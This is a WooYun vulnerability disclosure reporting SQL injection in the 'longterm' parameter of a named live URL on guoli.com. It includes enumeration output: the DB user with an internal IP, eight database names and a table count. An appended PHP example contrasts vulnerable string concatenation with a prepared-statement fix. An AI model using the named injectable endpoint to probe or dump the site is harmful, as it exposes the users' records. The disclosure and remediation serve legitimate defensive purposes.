
Vulnerability summary

Defect ID: wooyun-2015-0124374

Title: SQL injection at a certain location on 果粒网 (hundreds of thousands of user records, 148 tables)

Affected vendor: 果粒网

Author: 路人甲

Submitted: 2015-07-04 21:58

Fix time: 2015-08-18 22:00

Disclosed: 2015-08-18 22:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-18: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.

Detailed description:

Official site: http://www.guoli.com/
Injection URL:

http://www.guoli.com/renwen/index.php?&longterm=1&sp1=0
Parameter: longterm is injectable


[screenshot: 150703_1.png]


Information:

current user:    'adushi@172.16.3.100'


Database:

current database:    'adushi'


Databases:

available databases [8]:
[*] adushi
[*] dedev5
[*] discuz
[*] guoli
[*] guolicuser
[*] information_schema
[*] uch
[*] yanqing


[screenshot: 150703_2.png]


Tables:

Database: adushi
[148 tables]


[screenshot: 150703_3.png]


Proof of vulnerability:

As above.

Remediation:

Filter the input.
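The report's remediation is a single word, so as an added illustration (not code from guoli.com, whose source the report does not show) here is a hypothetical PHP handler showing the pattern behind the bug and its fix: longterm is validated as the integer flag it is meant to be and bound as a prepared-statement parameter instead of being concatenated into the SQL text. The table and column names, the DB account and the connection settings are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the site's code. Table, column and account names are assumed.

// Vulnerable pattern (the shape the report implies): the request parameter is
// spliced into the SQL string, so the parameter controls the query, not just a value.
function findRenwenVulnerable(PDO $db, array $query): array
{
    $longterm = $query['longterm'] ?? '0';
    $sql = "SELECT id, title FROM renwen WHERE longterm = " . $longterm;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: validate the parameter against the type and range it should
// have, then bind it as a typed value. The SQL text is now a constant, so user
// input can never change the statement's structure.
function findRenwenSafe(PDO $db, array $query): array
{
    $longterm = filter_var($query['longterm'] ?? '0', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 1],
    ]);
    if ($longterm === false) {
        // Reject rather than "clean": anything that is not 0 or 1 is an error.
        throw new InvalidArgumentException('longterm must be 0 or 1');
    }
    $stmt = $db->prepare('SELECT id, title FROM renwen WHERE longterm = :longterm');
    $stmt->bindValue(':longterm', $longterm, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth: the web account should only have the privileges this page
// needs on its own schema. The report shows the injected account could list
// eight databases, which a least-privilege account would not be able to do.
$db = new PDO(
    'mysql:host=' . getenv('DB_HOST') . ';dbname=' . getenv('DB_NAME') . ';charset=utf8mb4',
    getenv('DB_USER'),      // placeholder: a read-only, schema-scoped account
    getenv('DB_PASS'),
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

try {
    $rows = findRenwenSafe($db, $_GET);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    $rows = [];
}
```

Note that validating the parameter and binding it are complementary: binding alone stops the structural injection, while validation also keeps out-of-range values from reaching the query and gives a clean 400 to log and alert on.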

Copyright notice: when reproducing, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.